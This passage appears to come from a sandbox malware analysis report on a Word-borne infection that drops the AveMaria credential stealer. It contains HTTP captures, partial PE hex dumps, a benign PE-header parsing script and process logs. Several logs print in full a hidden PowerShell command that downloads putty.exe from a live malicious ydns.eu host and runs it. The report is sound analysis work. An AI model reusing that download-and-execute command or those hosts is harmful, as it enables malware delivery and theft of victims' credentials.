00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 2b 00 00 0a 28 2c 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 2d 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 
aa 00 02 16 28 2e 00 00 0a 00 02 16 28 2f 00 00 0a 00 02 17 28 30 00 00 0a 00 02 17 28 31 00 00 0a 00 02 16 28 32 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f 17 02 00 06 28 33 00 00 0a 00 2a 26 00 02 28 34 00 00 0a 00 2a ce 73 35 00 00 0a 80 01 00 00 04 73 36 00 00 0a 80 02 00 00 04 73 37 00 00 0a 80 03 00 00 04 73 38 00 00 0a 80 04 00 00 04 73 39 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 3a 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 3b 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 3c 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 3d 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 3e 00 00 0a 0a 2b 00 06 2a 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 3f 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 40 00 00 0a 6f 41 00 00 0a 73 42 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00 0b 00 00 00 07 00 00 11 00 7e 07 00 00 04 0a 2b 00 06 2a 22 00 02 80 07 00 00 04 2a 13 30 03 00 26 00 00 00 08 00 00 11 00 28 0b 00 00 06 72 3f 00 00 70 7e 07 00 00 04 6f 43 00 00 0a 28 44 00 00 0a 0b 07 74 25 00 00 01 0a 2b 00 06 2a 92 73 10 00 00 06 28 45 00 00 0a 74 06 00 00 02 80 08 00 00 04 73
                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELFaP z; @@ @(;O@` H.text` `.rsrc@"@@.reloc`(@B\;H w0(+(,(o-*(.(/(0(1(2*N(o(3*&(4*s5s6s7s8s9*0~o:+*0~o;+*0~o<+*0~o=+*0~o>+*0<~(?,!rp(@oAsB~+*0~+*"*0&(r?p~oC(Dt%+*s(Ets


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                2 | 192.168.2.22 | 49167 | 203.159.80.186 | 80 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                Timestamp | kBytes transferred | Direction | Data
                                Aug 2, 2021 10:59:58.669049025 CEST | 1537 | OUT | GET /putty.exe HTTP/1.1
                                Host: newhosteeeee.ydns.eu
                                Connection: Keep-Alive
                                Aug 2, 2021 10:59:58.711807013 CEST | 1538 | IN | HTTP/1.1 200 OK
                                Content-Type: application/octet-stream
                                Last-Modified: Sun, 01 Aug 2021 22:25:10 GMT
                                Accept-Ranges: bytes
                                ETag: "6ca734172487d71:0"
                                Server: Microsoft-IIS/8.5
                                Date: Mon, 02 Aug 2021 08:59:57 GMT
                                Content-Length: 731648
                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 46 1f 07 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 20 0b 00 00 08 00 00 00 00 00 00 7a 3b 0b 00 00 20 00 00 00 40 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 3b 0b 00 4f 00 00 00 00 40 0b 00 e4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 60 1f 0b 00 00 20 00 00 00 20 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e4 05 00 00 00 40 0b 00 00 06 00 00 00 22 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 0b 00 00 02 00 00 00 28 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5c 3b 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 00 f2 00 00 08 d2 02 00 03 00 00 00 01 00 00 06 08 c4 03 00 20 77 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 2b 00 00 0a 28 2c 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 2d 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 
aa 00 02 16 28 2e 00 00 0a 00 02 16 28 2f 00 00 0a 00 02 17 28 30 00 00 0a 00 02 17 28 31 00 00 0a 00 02 16 28 32 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f 17 02 00 06 28 33 00 00 0a 00 2a 26 00 02 28 34 00 00 0a 00 2a ce 73 35 00 00 0a 80 01 00 00 04 73 36 00 00 0a 80 02 00 00 04 73 37 00 00 0a 80 03 00 00 04 73 38 00 00 0a 80 04 00 00 04 73 39 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 3a 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 3b 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 3c 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 3d 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 3e 00 00 0a 0a 2b 00 06 2a 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 3f 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 40 00 00 0a 6f 41 00 00 0a 73 42 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00 0b 00 00 00 07 00 00 11 00 7e 07 00 00 04 0a 2b 00 06 2a 22 00 02 80 07 00 00 04 2a 13 30 03 00 26 00 00 00 08 00 00 11 00 28 0b 00 00 06 72 3f 00 00 70 7e 07 00 00 04 6f 43 00 00 0a 28 44 00 00 0a 0b 07 74 25 00 00 01 0a 2b 00 06 2a 92 73 10 00 00 06 28 45 00 00 0a 74 06 00 00 02 80 08 00 00 04 73
                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELFaP z; @@ @(;O@` H.text` `.rsrc@"@@.reloc`(@B\;H w0(+(,(o-*(.(/(0(1(2*N(o(3*&(4*s5s6s7s8s9*0~o:+*0~o;+*0~o<+*0~o=+*0~o>+*0<~(?,!rp(@oAsB~+*0~+*"*0&(r?p~oC(Dt%+*s(Ets


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                3 | 192.168.2.22 | 49169 | 203.159.80.165 | 80 | C:\ProgramData\images.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Aug 2, 2021 11:00:29.636285067 CEST | 2381 | OUT | GET /microC.exe HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate
                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                Host: hutyrtit.ydns.eu
                                Connection: Keep-Alive
                                Aug 2, 2021 11:00:29.667159081 CEST | 2383 | IN | HTTP/1.1 200 OK
                                Content-Type: application/octet-stream
                                Last-Modified: Mon, 02 Aug 2021 07:13:53 GMT
                                Accept-Ranges: bytes
                                ETag: "382415f36d87d71:0"
                                Server: Microsoft-IIS/8.5
                                Date: Mon, 02 Aug 2021 09:00:29 GMT
                                Content-Length: 1378816
                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 31 9b 07 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 2e 14 00 00 da 00 00 00 00 00 00 06 4c 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 15 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b4 4b 14 00 4f 00 00 00 00 60 14 00 20 d6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 15 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c 2c 14 00 00 20 00 00 00 2e 14 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 20 d6 00 00 00 60 14 00 00 d8 00 00 00 30 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 15 00 00 02 00 00 00 08 15 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 4b 14 00 00 00 00 00 48 00 00 00 02 00 05 00 90 30 01 00 64 ab 02 00 03 00 00 00 73 01 00 06 f4 db 03 00 c0 6f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 1d 00 00 0a 2a 26 00 02 28 1e 00 00 0a 00 2a ce 73 1f 00 00 0a 80 01 00 00 04 73 20 00 00 0a 80 02 00 00 04 73 21 00 00 0a 80 03 00 00 04 73 22 00 00 0a 80 04 00 00 04 73 
23 00 00 0a 80 05 00 00 04 2a 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 24 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 25 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 26 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 27 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 28 00 00 0a 0a 2b 00 06 2a 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 29 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 2a 00 00 0a 6f 2b 00 00 0a 73 2c 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00 0b 00 00 00 07 00 00 11 00 7e 07 00 00 04 0a 2b 00 06 2a 22 00 02 80 07 00 00 04 2a 13 30 03 00 26 00 00 00 08 00 00 11 00 28 09 00 00 06 72 31 00 00 70 7e 07 00 00 04 6f 2d 00 00 0a 28 2e 00 00 0a 0b 07 74 24 00 00 01 0a 2b 00 06 2a 00 00 13 30 03 00 26 00 00 00 08 00 00 11 00 28 09 00 00 06 72 37 00 00 70 7e 07 00 00 04 6f 2d 00 00 0a 28 2e 00 00 0a 0b 07 74 24 00 00 01 0a 2b 00 06 2a 00 00 13 30 03 00 26 00 00 00 08 00 00 11 00 28 09 00 00 06 72 3f 00 00 70 7e 07 00 00 04 6f 2d 00 00 0a 28 2e 00 00 0a 0b 07 74 24 00 00 01 0a 2b 00 06 2a 00 00 13 30 03 00 26 00 00 00 08 00 00 11 00 28 09 00 00 06 72 45 00 00 70 7e 07 00 00 04 6f 2d 00
                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL1aP.L `@ `@KO` @ H.text, . `.rsrc `0@@.reloc@@BKH0dso(*&(*ss s!s"s#*0~o$+*0~o%+*0~o&+*0~o'+*0~o(+*0<~(),!rp(*o+s,~+*0~+*"*0&(r1p~o-(.t$+*0&(r7p~o-(.t$+*0&(r?p~o-(.t$+*0&(rEp~o-
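Each response above is served as application/octet-stream, but the captured body starts with MZ and a PE header, and the first few hundred bytes already say a lot: the machine type, the number and names of the sections, the linker timestamp, and whether the data directory carries a CLR header (a .NET assembly, which is what the "Programmed in: .Net C# or VB.NET" entries further down report for the dropped files). The parser below is an added example for this report, not Joe Sandbox code. It embeds the first 496 bytes of the Data Raw dump from HTTP session 0 (DOS header, PE/COFF headers and the three section headers), parses them with struct, and cross-checks two things against the HTTP layer of the same session: the file size the section table implies against Content-Length, and the linker timestamp against Last-Modified. The other three sessions can be checked the same way by pasting their dumps in place of PE_HEAD_HEX.

```python
"""Parse the PE headers at the start of the captured /putty.exe body and
cross-check them against the HTTP response headers of the same session.

Added example for this report, not part of the Joe Sandbox output. PE_HEAD_HEX
is the first 496 bytes of the 'Data Raw' dump of HTTP session 0 above;
CONTENT_LENGTH and LAST_MODIFIED are copied from that session's response.
"""
import struct
from datetime import datetime, timezone

PE_HEAD_HEX = (
    "4d5a90000300000004000000ffff0000b8000000000000004000000000000000"
    "0000000000000000000000000000000000000000000000000000000080000000"
    "0e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f"
    "742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000"
    "504500004c010300461f07610000000000000000e00002010b01500000200b00"
    "00080000000000007a3b0b000020000000400b00000040000020000000020000"
    "0400000000000000040000000000000000800b00000200000000000002004085"
    "0000100000100000000010000010000000000000100000000000000000000000"
    "283b0b004f00000000400b00e405000000000000000000000000000000000000"
    "00600b000c000000000000000000000000000000000000000000000000000000"
    "0000000000000000000000000000000000000000000000000020000008000000"
    "0000000000000000082000004800000000000000000000002e74657874000000"
    "601f0b000020000000200b000002000000000000000000000000000020000060"
    "2e72737263000000e405000000400b000006000000220b000000000000000000"
    "00000000400000402e72656c6f6300000c00000000600b000002000000280b00"
    "00000000000000000000000040000042"
)
CONTENT_LENGTH = 731648                                   # HTTP response header
LAST_MODIFIED = datetime(2021, 8, 1, 22, 25, 10, tzinfo=timezone.utc)  # HTTP response header

IMAGE_FILE_MACHINE_I386 = 0x14C
IMAGE_NT_OPTIONAL_HDR32_MAGIC = 0x10B
DIR_COM_DESCRIPTOR = 14          # data-directory slot of the CLR (.NET) header

def parse_pe_headers(data):
    """Return the fields a triage needs from the DOS, COFF and optional headers
    and the section table. Raises ValueError for anything that is not PE32."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    coff = e_lfanew + 4
    machine, nsections, timestamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic != IMAGE_NT_OPTIONAL_HDR32_MAGIC:
        raise ValueError(f"unsupported optional header magic {magic:#x}")
    entry = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<I", data, opt + 28)[0]
    subsystem, dll_chars = struct.unpack_from("<HH", data, opt + 68)
    n_dirs = struct.unpack_from("<I", data, opt + 92)[0]
    dirs = [struct.unpack_from("<II", data, opt + 96 + 8 * i) for i in range(n_dirs)]
    sections = []
    table = opt + opt_size
    for i in range(nsections):          # 40-byte IMAGE_SECTION_HEADER entries
        name, vsize, vaddr, rawsize, rawptr = struct.unpack_from("<8sIIII", data, table + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode(), "vaddr": vaddr,
                         "vsize": vsize, "rawptr": rawptr, "rawsize": rawsize})
    clr_rva, clr_size = dirs[DIR_COM_DESCRIPTOR] if n_dirs > DIR_COM_DESCRIPTOR else (0, 0)
    return {
        "e_lfanew": e_lfanew,
        "machine": machine,
        "compile_time": datetime.fromtimestamp(timestamp, tz=timezone.utc),
        "entry_point": entry,
        "image_base": image_base,
        "subsystem": subsystem,
        "dll_characteristics": dll_chars,
        "is_dotnet": clr_rva != 0 and clr_size != 0,
        "sections": sections,
        # End of the last section's raw data: the file size the headers imply
        # for an image without an overlay or an Authenticode signature.
        "implied_size": max(s["rawptr"] + s["rawsize"] for s in sections),
    }

def cross_check(info, content_length, last_modified):
    """Compare what the PE headers say with what the HTTP layer said."""
    return {
        "size_matches_content_length": info["implied_size"] == content_length,
        "compile_time_equals_last_modified": info["compile_time"] == last_modified,
    }

if __name__ == "__main__":
    info = parse_pe_headers(bytes.fromhex(PE_HEAD_HEX))
    print(info["compile_time"], [s["name"] for s in info["sections"]], "dotnet:", info["is_dotnet"])
    print(cross_check(info, CONTENT_LENGTH, LAST_MODIFIED))
```

For session 0 the headers describe a 32-bit (0x14c) PE32 GUI image with sections .text, .rsrc and .reloc and a populated CLR directory at RVA 0x2008, so it is a .NET assembly despite the putty.exe name. The section table ends at 0xb2a00 = 731648 bytes, exactly the Content-Length, so there is no overlay; and the linker timestamp 0x61071f46 is 2021-08-01 22:25:10 UTC, the same second as the server's Last-Modified, which places the build right before the upload.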


                                Code Manipulations

                                Statistics

                                Behavior

                                System Behavior

                                General

                                Start time: 10:59:37
                                Start date: 02/08/2021
                                Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                Wow64 process (32bit): false
                                Commandline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                Imagebase: 0x13f7d0000
                                File size: 1424032 bytes
                                MD5 hash: 95C38D04597050285A18F66039EDB456
                                Has elevated privileges: true
                                Has administrator privileges: true
                                Programmed in: C, C++ or other language
                                Reputation: high

                                General

                                Start time: 10:59:40
                                Start date: 02/08/2021
                                Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit): false
                                Commandline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
                                Imagebase: 0x13f100000
                                File size: 473600 bytes
                                MD5 hash: 852D67A27E454BD389FA7F02A8CBE23F
                                Has elevated privileges: true
                                Has administrator privileges: true
                                Programmed in: .Net C# or VB.NET
                                Yara matches:
                                • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000003.00000002.2094462607.0000000000160000.00000004.00000020.sdmp, Author: Florian Roth
                                Reputation: high

                                General

                                Start time: 10:59:40
                                Start date: 02/08/2021
                                Path: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE
                                Wow64 process (32bit): false
                                Commandline: 'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PNG32.FLT
                                Imagebase: 0x13f870000
                                File size: 157024 bytes
                                MD5 hash: AF5CCD95BAC7ADADD56DE185D7461B2C
                                Has elevated privileges: false
                                Has administrator privileges: false
                                Programmed in: C, C++ or other language
                                Reputation: moderate

                                General

                                Start time:10:59:41
                                Start date:02/08/2021
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
                                Imagebase:0x13f100000
                                File size:473600 bytes
                                MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000006.00000002.2096261364.00000000002C0000.00000004.00000020.sdmp, Author: Florian Roth
                                Reputation:high

                                General

                                Start time:10:59:41
                                Start date:02/08/2021
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
                                Imagebase:0x13f100000
                                File size:473600 bytes
                                MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Reputation:high

                                General

                                Start time:10:59:44
                                Start date:02/08/2021
                                Path:C:\Users\user\AppData\Roaming\putty.exe
                                Wow64 process (32bit):true
                                Commandline:'C:\Users\user\AppData\Roaming\putty.exe'
                                Imagebase:0x100000
                                File size:731648 bytes
                                MD5 hash:0CFE251E0B61BBC87656F52DEFAD4C53
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000A.00000002.2119294130.0000000002637000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2119294130.0000000002637000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000A.00000002.2119294130.0000000002637000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2122718897.0000000003601000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000A.00000002.2122718897.0000000003601000.00000004.00000001.sdmp, Author: Joe Security
                                Antivirus matches:
                                • Detection: 100%, Joe Sandbox ML
                                • Detection: 28%, ReversingLabs
                                Reputation:low

                                General

                                Start time:10:59:44
                                Start date:02/08/2021
                                Path:C:\Users\user\AppData\Roaming\putty.exe
                                Wow64 process (32bit):true
                                Commandline:'C:\Users\user\AppData\Roaming\putty.exe'
                                Imagebase:0x100000
                                File size:731648 bytes
                                MD5 hash:0CFE251E0B61BBC87656F52DEFAD4C53
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2123072051.00000000035C1000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000B.00000002.2123072051.00000000035C1000.00000004.00000001.sdmp, Author: Joe Security
                                Reputation:low

                                General

                                Start time:10:59:51
                                Start date:02/08/2021
                                Path:C:\Users\user\AppData\Roaming\putty.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Users\user\AppData\Roaming\putty.exe
                                Imagebase:0x100000
                                File size:731648 bytes
                                MD5 hash:0CFE251E0B61BBC87656F52DEFAD4C53
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low

                                General

                                Start time:10:59:52
                                Start date:02/08/2021
                                Path:C:\Users\user\AppData\Roaming\putty.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\AppData\Roaming\putty.exe
                                Imagebase:0x100000
                                File size:731648 bytes
                                MD5 hash:0CFE251E0B61BBC87656F52DEFAD4C53
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2118755811.00000000005B6000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000D.00000003.2118755811.00000000005B6000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2118971999.00000000005BD000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000D.00000003.2118971999.00000000005BD000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2119027493.00000000005C3000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000D.00000003.2119027493.00000000005C3000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2118869644.00000000005B6000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000D.00000003.2118869644.00000000005B6000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2118769952.00000000005BD000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000D.00000003.2118769952.00000000005BD000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: AveMaria_WarZone, Description: unknown, Source: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Author: unknown
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2118879592.00000000005BD000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000D.00000003.2118879592.00000000005BD000.00000004.00000001.sdmp, Author: Joe Security
